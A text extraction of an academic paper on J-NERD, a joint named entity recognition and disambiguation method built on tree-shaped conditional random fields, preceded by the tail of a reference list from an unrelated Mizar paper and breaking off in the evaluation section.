mathe- matics for mathematicians. Journal of Automated Reasoning 50(2):119–121 DOI 10.1007/s10817-012-9268-z. Urban J. 2005. XML-izing Mizar: making semantic processing and presentation of MML easy. In: Kohlhase M, ed. Mathematical knowledge management, 4th international conference, MKM 2005, Bremen, Germany, July (2005) 15–17, Revised Selected Papers. Volume 3863 of Lecture Notes in Computer Science. Berlin: Springer, 346–360 DOI 10.1007/11618027_23. Urban J. 2008. Automated reasoning for Mizar: artificial intelligence through knowl- edge exchange. In: Rudnicki P, Sutcliffe G, Konev B, Schmidt RA, Schulz S, eds. Proceedings of the LPAR 2008 workshops, knowledge exchange: automated provers and proof assistants, and the 7th international workshop on the implementation of Logics, Doha, Qatar, November 22, 2008. Volume 418 of CEUR workshop proceedings: CEUR- WS.org, Available at http://ceur-ws.org/Vol-418/paper1.pdf . Urban J, Hoder K, Voronkov A. 2010. Evaluation of automated theorem proving on the Mizar Mathematical Library. In: Fukuda K, Van der Hoeven J, Joswig M, Takayama N, eds. Mathematical software –ICMS 2010, third international congress on mathematical software, Kobe, Japan, September (2010) 13–17. Proceedings. Volume 6327 of Lecture Notes in Computer Science. Berlin: Springer, 155–166 DOI 10.1007/978-3-642-15582-6_30. Urban J, Rudnicki P, Sutcliffe G. 2013. ATP and presentation service for Mizar formal- izations. Journal of Automated Reasoning 50(2):229–241 DOI 10.1007/s10817-012-9269-y. Urban J, Sutcliffe G. 2010. Automated reasoning and presentation support for formalizing mathematics in Mizar. In: Autexier S, Calmet J, Delahaye D, Ion PDF, Rideau L, Rioboo R, Sexton AP, eds. Intelligent computer mathematics, 10th international conference, AISC 2010, 17th symposium, Calculemus 2010, and 9th International Conference, MKM 2010, Paris, France, July (2010) 5–10. Proceedings. Volume 6167 of Lecture Notes in Computer Science. Berlin: Springer, 132–146 DOI 10.1007/978-3-642-14128-7_12. Wiedijk F (ed.) 2006. The seventeen provers of the world, foreword by Dana S. Scott. Volume 3600 of Lecture Notes in Computer Science. Berlin: Springer DOI 10.1007/11542384. Korniłowicz (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.320 16/16 https://peerj.com http://dx.doi.org/10.4064/fm-32-1-176-783 http://dx.doi.org/10.1007/s10817-012-9268-z http://dx.doi.org/10.1007/11618027_23 http://ceur-ws.org/Vol-418/paper1.pdf http://dx.doi.org/10.1007/978-3-642-15582-6_30 http://dx.doi.org/10.1007/s10817-012-9269-y http://dx.doi.org/10.1007/978-3-642-14128-7_12 http://dx.doi.org/10.1007/11542384 http://dx.doi.org/10.7717/peerj-cs.320 work_duq33giwkjd7djgxwuk3nmjagm ---- J-NERD: Joint Named Entity Recognition and Disambiguation with Rich Linguistic Features Abstract Methods for Named Entity Recogni- tion and Disambiguation (NERD) perform NER and NED in two separate stages. Therefore, NED may get penalized by NER false positives, and suffers in re- call by false negatives. Conversely, NED does not fully exploit information com- puted by NER such as types of men- tions. This paper presents J-NERD, a new approach to perform NER and NED jointly, by means of a probabilistic graph- ical model that captures mention spans, mention types, and the mapping of men- tions to entities in a knowledge base. We present experiments with different kinds of texts from the CoNLL’03, ACE’05, and ClueWeb’09-FACC1 corpora. J-NERD consistently outperforms state-of-the-art competitors in end-to-end NERD preci- sion, recall, and F1. 1 Introduction Motivation: Methods for Named Entity Recog- nition and Disambiguation, NERD for short, typi- cally proceed in two stages: • At the NER stage, text spans of entity men- tions are detected and tagged with coarse- grained types like person, organization, loca- tion, etc. This is typically performed by a trained Conditional Random Field (CRF) over word sequences (e.g., (Finkel et al., 2005)). • At the NED stage, mentions are mapped to entities in a knowledge base (KB) based on contextual similarity measures and the seman- tic coherence of the selected entities (e.g., (Cucerzan, 2014; Hoffart et al., 2011; Ratinov et al., 2011)). This two-stage approach has limitations. First, NER may produce false positives that can mis- guide NED. Second, NER may miss out on some entity mentions, and NED has no chance to com- pensate for these false negatives. Third, NED is not able to help NER, for example, by disambigua- tion “easy” mentions (e.g., of prominent entities with more or less unique names) and then using the entities and knowledge about them as enriched features for NER. Example: Consider the following sentences: David played for manu, real, and la galaxy. His wife posh performed with the spice girls. This is difficult for NER because of the absence of upper-case spelling, which is not untypical in social media, for example. Most NER methods will miss out on multi-word mentions or words that are also common nouns (“spice”) or adjec- tives (“posh”, “real”). Typically, NER would pass only the mentions “David”, “manu”, and “la” to the NED stage, which then is prone to many errors like mapping the first two mentions to any promi- nent people with first names David and Manu, and mapping the third one to the city of Los Ange- les. With NER and NED performed jointly, the possible disambiguation of “la galaxy” to the soc- cer club can guide NER to tag the right mentions with the right types (e.g., recognizing that “manu” could be a short name for a soccer team), which in turn helps NED to map “David” to the right entity David Beckham. Contribution: This paper presents a novel kind of probabilistic graphical model for the joint recogni- tion and disambiguation of named-entity mentions in natural-language texts. With this integrated ap- proach to NERD, we aim to overcome the limi- tations of the two-stage NER/NED methods dis- cussed above. Our method, coined J-NERD , is based on a supervised, non-linear CRF that combines multi- ple per-sentence CRF’s into an entity-coherence- aware global CRF. The global CRF detects men- tion spans, tags them with coarse-grained types, and maps them to entities in a single joint- inference step based on Gibbs sampling. The J-NERD method comprises the following novel contributions: • a tree-shaped CRF for each sentence, whose structure is derived from the dependency parse tree and thus captures linguistic context in a deeper way compared to prior work with CRF’s for NER and NED; • richer linguistic features not considered in prior work, harnessing dependency parse trees and verbal patterns that indicate mention types as part of their nsubj or nobj arguments; • an inference method that maintains the un- certainty of both mention candidates (i.e., to- ken spans) and entity candidates for competing mention candidates and makes joint decisions, as opposed to fixing mentions before reason- ing on their disambiguation. We present experiments with three major datasets: the CoNLL’03 collection of newswire articles, the ACE’05 corpus of news and blogs, and the ClueWeb’09-FACC1 corpus of web pages. Baselines that we compare J-NERD with include AIDA-light (Nguyen et al., 2014), Spotlight (Daiber et al., 2013), and TagMe (Ferragina and Scaiella, 2010), and the recent joint NER/NED method of Durrett and Klein (2014). J-NERD consistently outperforms these competitors in terms of both precision and recall. The J-NERD code and all experi- mental data are publicly available at the URL anonymized-for-doubleblind-review. 2 Related Work NER: Detecting the boundaries of text spans that denote named entities has been mostly addressed by supervised CRF’s over word sequences (Mc- Callum and Li, 2003; Finkel et al., 2005). The work of Ratinov and Roth (2009) improved these techniques by additional features from context ag- gregation and external lexical sources (gazetteers, etc.). Passos et al. (2014) harnessed skip-gram features and external dictionaries for further im- provement. An alternative line of NER techniques is based on dictionaries of name-entity pairs, in- cluding nicknames, short-hand names, and para- phrases (e.g., “the first man on the moon”). The work of Ferragina (Ferragina and Scaiella, 2010) and Mendes (Mendes et al., 2011) are examples of dictionary-based NER. The work of Spitkovsky and Chang (2012) is an example for a large-scale dictionary that can be harnessed by such methods. An additional output of the CRF’s are type tags for the recognized word spans, typically limited to coarse-grained types like Person, Organization, and Location (and also Miscellaneous). The most widely used tool of this kind is the Stanford NER Tagger (Finkel et al., 2005). Many NED tools use the Stanford NER Tagger for their first stage of detecting mentions. Mention Typing: The specific NER of inferring semantic types has been further refined and ex- tended by various works on fine-grained typing (e.g., politicians, musicians, singers, guitarists) for entity mentions and general noun phrases (Fleis- chman and Hovy, 2002; Rahman and Ng, 2010; Ling and Weld, 2012; Yosef et al., 2012; Nakas- hole et al., 2013). Most of this work is based on supervised classification, using linguistic features from mentions and their surrounding text. One exception is the work of Nakashole et al. (2013) which is based on text patterns that connect enti- ties of specific types, acquired by sequence mining from the Wikipedia full-text corpus. In contrast to our work, these are simple surface patterns, and the task addressed here is limited to typing noun phrases that likely denote emerging entities that are not yet registered in a KB. NED: Methods and tools for NED go back to the seminal works of (Dill et al., 2003; Bunescu and Pasca, 2006; Cucerzan, 2007; Milne and Witten, 2008). More recent advances led to open-source tools like the Wikipedia Miner Wikifier (Milne and Witten, 2013), the Illinois Wikifier (Ratinov et al., 2011), Spotlight (Mendes et al., 2011), Se- manticizer (Meij et al., 2012) TagMe (Ferragina and Scaiella, 2010; Cornolti et al., 2014), and AIDA (Hoffart et al., 2011) with its improved vari- ant AIDA-light (Nguyen et al., 2014). We choose some, namely, Spotlight, TagMe and AIDA-light, as baselines for our experiments. These are the best-performing, publicly available systems for news and web texts. Most of these methods com- bine contextual similarity measures with some form of considering the coherence among a se- lected set of candidate entities for the disambigua- tion. The latter aspect can be cast into a variety of computational models, like graph algorithms (Hoffart et al., 2011), integer linear programming (Ratinov et al., 2011), or probabilistic graphical models (Kulkarni et al., 2009). All these methods use the Stanford NER Tagger or dictionary-based matching for their NER stages. Kulkarni et al. (2009) uses an ILP or LP solver (with rounding) for the NED inference, which is computationally expensive. Note that some of the NED tools aim to link not only named entities but also general concepts (e.g. “world peace”) for which Wikipedia has articles. In this paper, we solely focus on proper entities. Joint NERD: There is little prior work on per- forming NER and NED jointly. (Sil and Yates, 2013; Durrett and Klein, 2014) are the most no- table methods. Sil and Yates (2013) first com- piles a liberal set of mention and entity candidates, and then performs joint ranking of the candidates. Durrett and Klein (2014) presents a CRF model for coreference resolution, mention typing, and mention disambiguation. Our model is also based on CRF’s, but distinguishes itself from prior work in three ways: 1) tree-shaped per-sentence CRF’s derived from dependency parse trees, as opposed to merely having connections among mentions and entity candidates; 2) linguistic features about ver- bal phrases from dependency parse trees; 3) main- taining candidates for both mentions and entities and jointly reasoning on their uncertainty. Our ex- periments include comparisons with the method of (Durrett and Klein, 2014). There are also benchmarking efforts on mea- suring the performance for end-to-end NERD (Cornolti et al., 2013; Carmel et al., 2014; Us- beck et al., 2015), as opposed to assessing NER and NED separately. However, to the best of our knowledge, none of the participants in these com- petitions considered integrating NER and NED. 3 Overview of the J-NERD Method For labeling the token sequence 〈tok1, . . . , tokm〉 with mention boundaries, NER types, and NED entities, we have devised different kinds of graph- ical models (Koller et al., 2007). While state-of- the-art methods like the Stanford NER tagger em- ploy a linear-chain CRF (Sutton and McCallum, 2012) for this task, we use more sophisticated tree- shaped models whose structure is obtained from dependency parse trees. The per-sentence CRF’s are then combined into a global model by adding cross-sentence dependencies whenever the same token sequence appears as mention candidates in several sentences. Figure 3 gives an example of a global CRF for two sentences. These CRF models use a variety of features. Some of these are fairly standard for NER/NED, whereas others are novel contributions of this pa- per: • Standard features include lexico-syntactic properties of tokens like POS tags, matches in dictionaries/gazetteers, and similarity mea- sures between token strings and entity names. Also, entity-entity coherence is an important feature for NED – not exactly a standard fea- ture, but used in some prior works. • Features about the topical domain of an input text (e.g., politics, sports, football, etc.) are obtained by a classifier based on “easy men- tions”: those mentions for which the NED de- cision can be made with very high confidence without advanced features. The use of do- mains for NED was introduced by (Nguyen et al., 2014). Here we further extend this tech- nique by harnessing domain features for joint inference on NER and NED. • The most advanced feature group captures typed dependencies from the sentence pars- ing. Such features have not been used in prior work. The feature space of J-NERD is presented in de- tail in Section 4; the graphical models and their learning and inference methods are further dis- cussed in Section 5. In the rest of this section we introduce various building blocks that J-NERD uses for preprocess- ing inputs and for computing features. 3.1 Language Processing We employ the Stanford CoreNLP tool suite (nlp.stanford.edu/software/corenlp.shtml) for processing input documents. This includes tokenization, sentence detection, POS tagging, lemmatization, and dependency parsing. All of these provide features for our CRF model. In particular, we harness dependency types between noun phrases (de Marneffe et al., 2006), like nsubj, dobj, prep in, prep for, etc. 3.2 Entity Repository and Name-Entity Dictionary We utilize a large knowledge base, namely, YAGO2 (Hoffart et al., 2013), as an entity repo- sitiory and as a major source of a dictionary of name-entity pairs (aliases incl. paraphrases). For the latter, we import the YAGO2 means and hasName relations, a total of more than 6 Mil- lion name-entity pairs (for ca. 3 Million distinct entities). We also derive NER-type-specific phrase dictionaries. To this end, we also import sup- porting phrases from GATE (Cunningham et al., 2011), e.g., “Mr.”, “Mrs.”, “Dr.”, “President”, etc. for the type Person, “city”, “river”, “park”, etc. for the type Location, “company”, “institute”, “Inc.”, “Ltd.”, etc. for the type Organization. Context Statistics: To compute values for the features described in Section 4, we obtain statis- tics for different kinds of contexts for tokens and candidate entities. We distinguish two kinds of contexts: i) based on other tokens, and ii) based on patterns of parsing dependencies; these are represented as a bag-of-words or a bag-of- linguistic-patterns, respectively, each with tf-idf scores. Here tf denotes token frequencies and idf denotes inverse document frequencies (Croft et al., 2009). The tf values are obtained from the in- put document at hand; the idf values are estimated from a large Wikipedia text dump. Token Context of Tokens. For a given token toki, all tokens tokj in the same input document form the token context and are associated with their tf- idf scores. Thus, all tokens in the same document have identical token contexts. Linguistic Context of Tokens. For all pars- ing dependencies, in which a token toki oc- curs, we treat the dependency type and the other argument of the dependency as linguistic pat- terns and compute their frequencies in the doc- ument (tf) and their inverse document frequen- cies in the Wikipedia corpus (idf). In the ex- ample sentence “David played for manu, real, and la galaxy”, the linguistic context of the to- ken “manu” consists of the Stanford parser depen- dencies prep for[played, manu], conj and[manu, real], and conj and[manu, galaxy]. This leads to the patterns prep for[played, ∗], conj and[∗, real], and conj and[∗, galaxy] with wildcards ∗, for which we compute tf-idf scores. Token Context of Entities. For each candidate entity enti, we extract all tokens from keyphrases associated with enti and compute tf-idf scores for these tokens. The keyphrases are distilled from Wikipedia link anchor texts (Hoffart et al., 2011) and are part of the YAGO2 knowledge base. For example, the entity David Beckham has keyphrases such as “player of the year”, “cham- pions league final”, “Manchester United”, etc. Thus, we compute tf-idf statistics for tokens like “player”, “year”, “champions”, etc. Linguistic Context of Entities. For a candi- date entity enti, we extract all linguistic pat- terns (with tf-idf scores) where enti occurs from the Wikipedia corpus. The result of parsing the Wikipedia corpus by a dependency tool is saved in our database. 3.3 Mention Candidates & Entity Candidates To determine the candidate mentions in a token se- quence, we first perform exact-match lookups of all sub-sequences against the name-entity dictio- nary. As an option (and by default), this can be limited to sub-sequences that are tagged as noun phrases by the Stanford parser. For higher recall, we then add partial-match lookups where a token sub-sequence matches only some but not all to- kens of an entity name in the dictionary. For ex- ample, for the sentence “David played for manu, real and la galaxy”, we obtain “David”, “manu”, “real”, “la galaxy”, “la”, and “galaxy” as candi- date mentions. This process yields features; our CRF model then learns how to determine the ac- tual mention boundaries. The entity candidates then are simply all enti- ties that are associated with at least one of the can- didate mentions. As we include highly ambigu- ous mentions and the knowledge base contains thousands of candidate entities for some mentions, we use pruning heuristics to restrict the candidate space. For each candidate mention, we consider only the top k (using k = 20 in our experiments) highest ranked entities. The ranking is based on the string similarity between the mention and the primary entity name, the prior popularity of the en- tity, and the local context similarity (feature func- tions f8,f9,f10 in Section 4). For each candidate mention, we add a virtual entity out-of-kb (out of knowledge base) to the entity candidate space, to prepare for the possi- ble situation that the mention actually denotes an emerging or long-tail entity that is not contained in the knowledge base at all. We compute the token context of a mention-specific out-of-kb entity, for a given mention token toki, based on the method of (Hoffart et al., 2014). First, we form the set union of the token contexts of all candidate entities for toki, and subtract this union from the token context of toki. Second, we compute tf-idf scores for the remaining tokens, using the idf esti- mates from Wikipedia (as for all other tokens) and setting tf to 1 (as the out-of-kb entity is not observable). 4 Feature Space We define feature templates f1–f17 for computing the NER type and the NED label of a token toki that denotes or is part of a mention. The bound- aries of a mention, i.e., its token span, are then triv- ially derived by combining adjacent tokens with the same NER type label (and disregarding all to- kens with label “other”). Let posi be the POS tag of toki, dici is the NER tag from the dictionary lookup of toki, and depi is the parsing dependency that con- nects toki with another token. We write suri = 〈toki−1, toki, toki+1〉 to refer to the sequence of tokens surrounding toki. If lemmatization is en- abled, toki can be replaced by lemi. Next, let Ci be the set of candidate entities for all possible mentions that contain token toki. Finally, let d be the domain which the input text is classified into (see Section 3) For a given training corpus (e.g., the CoNLL- YAGO2 training set), the feature templates are expanded into concrete features, considering also background dictionaries and knowledge-base statistics. Some of these are Boolean fea- tures, others are real-valued. The Boolean fea- tures (f2,f3,f4,f5,f6,f7,f14,f15,f16) capture the presence or absence of features like tokens, POS tags, dependency types, dictionary entries in a given input document on which we want to run end-to-end NERD. The real-valued features (f1,f8,f9,f10,f11,f12,f13,f17) capture similar- ity and relatedness measures between tokens, do- mains, or entities; these measures are precom- puted on background resources like dictionaries and knowledge bases. These features are partic- ularly crucial for NED, which needs to cope with many thousands of possible output labels (the en- tities for the mentions in a text). 4.1 Standard Features Token-Type Prior. This feature f1 captures a prior probability of toki being of NER type typej. These probabilities are estimated from NER-annotated corpora. In our experiments, we use the training subsets of different test corpora, where training and test data are disjoint. For exam- ple, we may have a prior f1(“Ltd.”, ORG) = 0.8. Current POS. The feature template f2(toki,posi, typej) generates binary fea- tures for all training-corpus tokens toki with part-of-speech tag posi and NER label typej. For the same token, multiple features may be generated: for example, if token “real” occurs in the training corpus in the phrase “real (JJ) madrid (NN)”, this generates features f21(toki, JJ, ORG) and f22(toki, JJ, LOC), etc. When later observing token toki in an input document, the feature (toki,posi, typej) is set to 1 if toki has POS tag posi and typej is one of the corresponding NER types in the training corpus. In the rest of this section, binary features are generated from feature templates analogously. In-Dictionary. The feature template f3(toki,dici, typej) generates binary features if toki is in the name-entity dictionary for some entity of NER type typej. Uppercase. The feature template f4(toki, typej) generates binary features if toki appears in upper- case form and is NER-labeled as typej in the train- ing corpus. Surrounding POS. The feature template f5(toki,suri, typej) generates binary features if token toki and the POS tag sequence of its surrounding tokens suri appear in the training corpus where toki has NER label typej. Surrounding Tokens. The feature template f6(toki,suri, typej) generates binary features if token toki has NER type typej given that toki ap- pears with surrounding tokens suri in an NER- annotated training corpus. This could possibly lead to a huge number of features. For tractabil- ity, we thus ignore sequences that only occur once in the training corpus. Surrounding In-Dictionary. The feature tem- plate f7(toki,suri, typej) performs dictionary lookups for surrounding tokens in suri. Similar to f6, it generates binary features if toki and the dictionary lookup sequence of its surrounding to- kens suri appear in the training corpus where toki has NER type typej. Token-Entity Prior. The real-valued feature f8 captures a prior probability of toki being entity entj. The probabilities are estimated from the occurrence frequencies of name-entity pairs in the background corpus, harnessing link anchor texts in Wikipedia. For example, we may have a prior f8(“Beckham”,David Beckham) = 0.7 as he is more popular (today) than his wife Victoria. On the other hand, f8(“David”,David Beckham) would be lower than f8(“David”,David Bowie), for example, as this still active pop star is more frequently and prominently mentioned than the retired football player. Token-Entity n-Gram Similarity. The real- valued feature f9 measures the Jaccard similar- ity of character-level n-grams a name in the dic- tionary that includes toki and the primary (i.e., full and most frequently used) name of an en- tity entj. For example, for n = 2 the value of f9(“Becks”,David Beckham) is 3 11 . In experi- ments we set n = 3. Token-Entity Token Contexts. The real-valued feature f10 measures the weighted overlap similar- ity between the token contexts (tok-cxt) of token toki and entity entj. We use a weighted gener- alization of the standard overlap coefficient, WO, between two sets X,Y of weighted elements, Xk and Yk. WO(X,Y ) = ∑ k min(Xk,Yk) min( ∑ k Xk, ∑ k Yk) For our setting of token contexts, the weights are tf-idf scores, hence: f10(toki,entj) = WO ( tok-cxt(toki), tok-cxt(entj) ) Entity-Entity Token Coherence. The real-valued feature f11 measures the coherence between the token contexts of two entity candidates enti and entj. f11(toki,entj) = WO ( tok-cxt(enti), tok-cxt(entj) ) For example, entities David Beckham and Manchester United are highly coherent as they share many tokens in their contexts, such as “champions”, “league”, “premier”, “cup”, etc. Thus, they should be chosen together. 4.2 Domain Features We use WordNet domains, created by (Miller, 1995; Magnini and Cavagli, 2000; Bentivogli et al., 2004), to construct a hierarchical taxonomy of 46 domains such as Politics, Economy, Sports, Sci- ence, Medicine, Biology, Art, Music, etc. We com- bine the domains with semantic types (classes of entities) provided by YAGO2, by assigning them to their respective domains. This is based on the manual assignment of WordNet synsets to do- mains by (Magnini and Cavagli, 2000; Bentivogli et al., 2004), and extends to additional types in YAGO2. For example, Singer is assigned to Mu- sic, and Football Player to Football, a sub-domain of Sports. These types include the standard NER types Person (PERS), Organization (ORG), Loca- tion (LOC), and Miscellaneous (MISC) which are further refined by the YAGO2 subclassOf hierar- chy. In total, the 46 domains are enhanced with ca. 350,000 types imported from YAGO2. J-NERD classifies input texts onto domains by means of “easy mentions”. An easy mention is a match in the name-entity dictionary for which there are at most three candidate entities (Nguyen et al., 2014). Although the mention set is not ex- plicitly given before running NERD, J-NERD still can extract “easy mentions” from the entirety of all mention candidates. Let C∗ be the set of candidate entities for easy mentions in the input document. For each domain d, we compute the coherence of the easy mentions M∗ = {m1,m2, . . .} coh(M∗) = |C∗ ∩Cd| |C∗| where Cd is the set of all entities under domain d. We classify the document into the domain with the highest coherence score. Although, the mentions and their entities may be inferred incorrectly, the domain classification still tends to work very reliably as it aggregates over all “easy” mention candidates. The following feature templates exploit domains. Entity-Domain Coherence. This feature captures the coherence between an entity candidate entj and the domain d which the input text is classified into. That is, f12(d,entj) = 1 if d ∈ dom(entj). Otherwise, the feature value is 0. Entity-Entity Type Coherence. This feature computes the relatedness between the Wikipedia categories of two candidate entities enti ∈ Ci, entj ∈ Cj. f13(enti,entj) = maxcu∈cat(enti) cv∈cat(entj) rel(cu,cv) where the function rel(cu,cv) computes the re- ciprocal length of the shortest path between cat- egories cu,cv in the domain taxonomy (Nguyen et al., 2014). Recall that our domain taxonomy con- tains hundred thousands of Wikipedia categories integrated in the YAGO2 type hierarchy. 4.3 Linguistic Features Linguistic Pattern from Dependency Parsing. Recall that we obtain dependency-parsing patterns by using Wikipedia as a large background corpus. Here we harness that Wikipedia contains many mentions with explicit links to entities and that the knowledge base provides us with the NER types for these entities. Typed-Dependency. The feature template f14(toki,depi, typej) generates binary features if the background corpus contains the pattern depi = deptype(arg1,arg2) where toki is ei- ther arg1 or arg2 and toki is labeled with NER type typej. For example, with token “manu” in our example sentence “David played for manu, real, and la galaxy”, a feature gener- ated from a similar sentence in Wikipedia would be f141(toki, prep for(“played”,∗), ORG). Typed-Dependency/POS. This feature template f15(toki,posi,depi, typej) captures linguistic patterns that combine parsing dependencies (like in f14) and POS tags (like in f2), learned from an annotated training corpus. It generates binary features if toki appears in the dependency pattern depi with POS tag posi and this configuration also occurs in the training data with NER label typej. Typed-Dependency/In-Dictionary. The feature template f16(toki,dici,depi, typej) captures lin- guistic patterns that combine parsing dependen- cies (like in f14) and dictionary lookups (like in f3), learned from an annotated training corpus. It generates binary features if toki appears in the de- pendency pattern depi and has an entry dici in the name-entity dictionary for some entity with NER label typej. Token-Entity Linguistic Contexts. The real- valued feature f17 measures the weighted overlap between the linguistic contexts (ling-cxt) of token toki and entity entj. f17(toki,entj) = WO ( ling-cxt(toki), ling-cxt(entj) ) 5 Graphical Models The CRF models that J-NERD uses for its infer- ence are initially constructed on a per-sentence ba- sis. These local CRF’s are then combined into a global model by adding non-local links to capture cross-sentence dependencies (Finkel et al., 2005) among mentions in different sentences (as illus- trated in Figure 3). 5.1 Linear-Chain Model In the local setting, J-NERD works on each sen- tence S = 〈tok1, . . . , tokm〉 separately. We con- struct a linear-chain CRF (see Figure 1) by intro- ducing an observed variable xi for each token toki that represents a proper word. For each xi, we ad- ditionally introduce a variable yi representing the combined NERD labels. As in any CRF, the xi,yi and yi,yi+1 pairs are connected via factors, whose weights we obtain from the feature functions de- scribed in Section 4. y1 y2 y3 y4 y5 y6 x1 x2 x3 x4 x5 x6 David played manu real la galaxy Figure 1: Linear-chain CRF. 5.2 Tree Model The factor graph for the tree model (see Figure 2) extends the linear-chain model by adding a factor linking each pair of labels yi,yj whenever these tokens have a typed dependency obtained from the Stanford parser. Figure 2 shows an example for the tree-shaped model. y1 y2 y3 y4 y5 y6 x1 x2 x3 x4 x5 x6 David played manu real la galaxy [nsubj] [p f] [p f] [p f] [det] Figure 2: Tree model. ([p f] is [prep for]) 5.3 Global Models Following (Finkel et al., 2005) for the global setting, we consider an entire input text, con- sisting of multiple sentences S1, . . . ,Sn = 〈tok1, . . . , tokm〉, for the construction of both the linear-chain model and the tree model. As shown in Figure 3, cross-sentence edges among pairs of labels yi,yj are introduced for candidate sets Ci,Cj that share at least one candidate entity, such as “David” and “David Beckham”. Additionally, we introduce factors for all pairs of tokens in adja- cent mentions within the same sentence, such as “David” and “manu”. 5.4 Inference & Learning For a given sequence of observed variables 〈x1, . . . ,xm〉, let L denote a sequence of NERD labels 〈y1, . . . ,ym〉, where each yi consists of an NER type typei and an NED label enti. Our in- ference objective is to find the most probable se- quence L∗. This goal is expressed by the follow- ing function: L∗ = arg max y1...ym exp ( m∑ t=1 K∑ k=1 λk featurek(yt,yprev(t),x1 . . .xm) ) where yi1 yi2 yi3 yi4 yi5 yi6 xi1 xi2 xi3 xi4 xi5 xi6 David played manu real la galaxy yj1 yj2 yj3 yj4 yj5 xj1 xj2 xj3 xj4 xj5 David Beckham born London England [nsubj] [p f] [p f] [p f] [det] [nn] [nn] [nsubjpass] [prep in] Figure 3: Global model, linking two tree models. ([p f] is [prep for]) • feature1..K are features generated from fea- ture templates f1..17 of Section 4, • prev(t) is the index of the label yj that yt de- pends on, i.e., the previous index (t − 1) in linear-chain models or the parent index in tree models, • and λk are feature weights, i.e., model param- eters to be learned. The number of generated features, K, depends on the training corpus and the choice of the CRF model. For the CoNLL-YAGO2 training set, the tree models have K = 1,767 parameters. Given a trained model, exact inference with respect to the above objective function can be efficiently per- formed by variants of the Viterbi algorithm (Sut- ton and McCallum, 2012) for the local models, both linear and tree models. For the global mod- els, however, exact solutions are computationally intractable. Therefore, we employ Gibbs sampling to approximate the solution. As for model parameters, J-NERD learns the feature weights λk from the training data by max- imizing a respective conditional likelihood func- tion (Sutton and McCallum, 2012), using a variant of the L-BFGS optimization algorithm (Liu and Nocedal, 1989). We do this for each local CRF model (linear and tree models), and apply the same learned weights to the corresponding global mod- els. Our implementation uses the RISO toolkit1 for belief networks. 6 Experiments 6.1 Setup 6.1.1 Test Data Collections Our evaluation is mainly based on the CoNLL- YAGO2 corpus of newswire articles. Additionally, we report on experiments with an extended version of the ACE-2005 corpus and a large sample of the entity-annotated ClueWeb’09-FACC1 Web crawl. CoNLL-YAGO2 is derived from the CoNLL- 1 http://riso.sourceforge.net/ YAGO corpus (Hoffart et al., 2011)2 by remov- ing tables where mentions in table cells do not have linguistic context, a typical example being sports results. The resulting corpus contains 1,244 documents with 20,924 mentions including 4,774 out-of-kb entities. Ground-truth entities in YAGO2 are provided by (Hoffart et al., 2011). For consistent ground-truth, we derived the NER types from the NED ground-truth entities, this way fix- ing some errors in the original annotations related to metonymy (e.g., labeling the mentions in “India beats Pakistan 2:1” incorrectly as LOC, whereas the entities are the sports teams of type ORG). This makes the dataset not only cleaner but also more demanding, as metonymous mentions are among the most difficult cases. For the evaluation we use the “testb” subset of CoNLL-YAGO, which – after the removal of ta- bles – has 231 documents with 5,616 mentions including 1,131 out-of-kb entities. The other 1,045 documents with a total of 17,870 mentions (including 4,057 out-of-kb mentions) are used for training. ACE is an extended variant of the ACE 2005 cor- pus3, with additional NED labels by (Bentivogli et al., 2010). We consider only proper entities and exclude mentions of general concepts such as “revenue”, “world economy”, “financial crisis” etc., as they do not correspond to individual enti- ties in a knowledge base. This reduces the number of mentions, but gives the task a crisp focus. We disallow overlapping mention spans and consider only maximum-length mentions, following the ra- tionale of the ERD Challenge 2014. The test set contains 117 documents with 2,958 mentions. ClueWeb contains two randomly sampled subsets of the ClueWeb’09-FACC14 corpus with Freebase annotations: 2 https://www.mpi-inf.mpg.de/departments/ databases-and-information-systems/research/ yago-naga/aida/downloads/ 3 http://projects.ldc.upenn.edu/ace/ 4 http://lemurproject.org/clueweb09/FACC1/ • ClueWeb: 1,000 documents (24,289 men- tions) each with at least 5 entities . • ClueWeblong−tail: 1,000 documents (49,604 mentions) each with at least 3 long-tail enti- ties. We consider an entity to be “long-tail” if it has at most 10 incoming links in the English Wikipedia. Note that these web documents are very different in style from the news-centric articles in CoNLL and ACE. Also note that the entity markup is au- tomatically generated, but with emphasis on high precision. So the data captures only a small subset of the potential entity mentions, and it may contain a small fraction of false entities. In addition to these larger test corpora, we ran experiments with several small datasets used in prior works: KORE (Hoffart et al., 2012), MSNBC (Cucerzan, 2007), and a subset of AQUAINT (Milne and Witten, 2008). Each of these has only a few hundred mentions, but they exhibit different characteristics. The findings on these datasets are fully in line with those of our main experiments; hence no explicit results are presented here. In all these test datasets, the ground-truth con- siders only individual entities and excludes gen- eral concepts, such as “climate change”, “har- mony”, “logic”, “algebra”, etc. These proper enti- ties are identified by the intersection of Wikipedia articles and YAGO2 entities. This way, we fo- cus on NERD. Systems that are designed for the broader task of “Wikification” are not penalized by their (typically lower) performance on inputs other than proper entity mentions. 6.1.2 Methods under Comparison We compare J-NERD in its four variants (linear vs. tree and local vs. global) to various state-of- the-art NER/NED methods. For NER (i.e., mention boundaries and types) we use the recent version 3.4.1 of the Stanford NER Tagger5 (Finkel et al., 2005) as a base- line. This version has NER benchmark results on CoNLL’03 that are as good as those reported in Ratinov and Roth (2009) and Passos et al. (2014). We retrained this model by using the same corpus- specific training data that we use for J-NERD . For NED, we compared J-NERD against the following methods for which we obtained open- source software or could call a web service: 5 nlp.stanford.edu/software/CRF-NER.shtml • Berkeley-entity (Durrett and Klein, 2014) is a joint model for coreference resolution, NER and NED with linkage to Wikipedia. • AIDA-light (Nguyen et al., 2014) is an opti- mized variant of the AIDA system (Hoffart et al., 2011), based on YAGO2. It uses the Stan- ford tool for NER. • TagMe (Ferragina and Scaiella, 2010) is a Wikifier that maps mentions to entities or con- cepts in Wikipedia. It uses a Wikipedia- derived dictionary for NER. • Spotlight (Mendes et al., 2011) links mentions to entities in DBpedia. It uses the LingPipe dictionary-based chunker for NER. Some systems use confidence thresholds to de- cide on when to map a mention to out-of-kb. For each dataset, we used withheld data to tune these system-specific thresholds. Figure 4 il- lustrates the sensitivity of the thresholds for the CoNLL-YAGO2 dataset. Figure 4: F1 for varying confidence thresholds. 6.1.3 Evaluation Measures We evalute the output quality at the NER level alone and for the end-to-end NERD task. We do not evaluate NED alone, as this would require giv- ing a ground-truth set of mentions to the systems under test to rule out that NER errors affect NED. Most competitors do not have interfaces for such a controlled NED-only evaluation. Each test collection has ground-truth annota- tions (G) consisting of text spans for mentions, NER types of the mentions, and mapping men- tions to entities in the KB or to out-of-kb. Re- call that the out-of-kb case captures entities that are not in the KB at all. Let X be the out- put of system 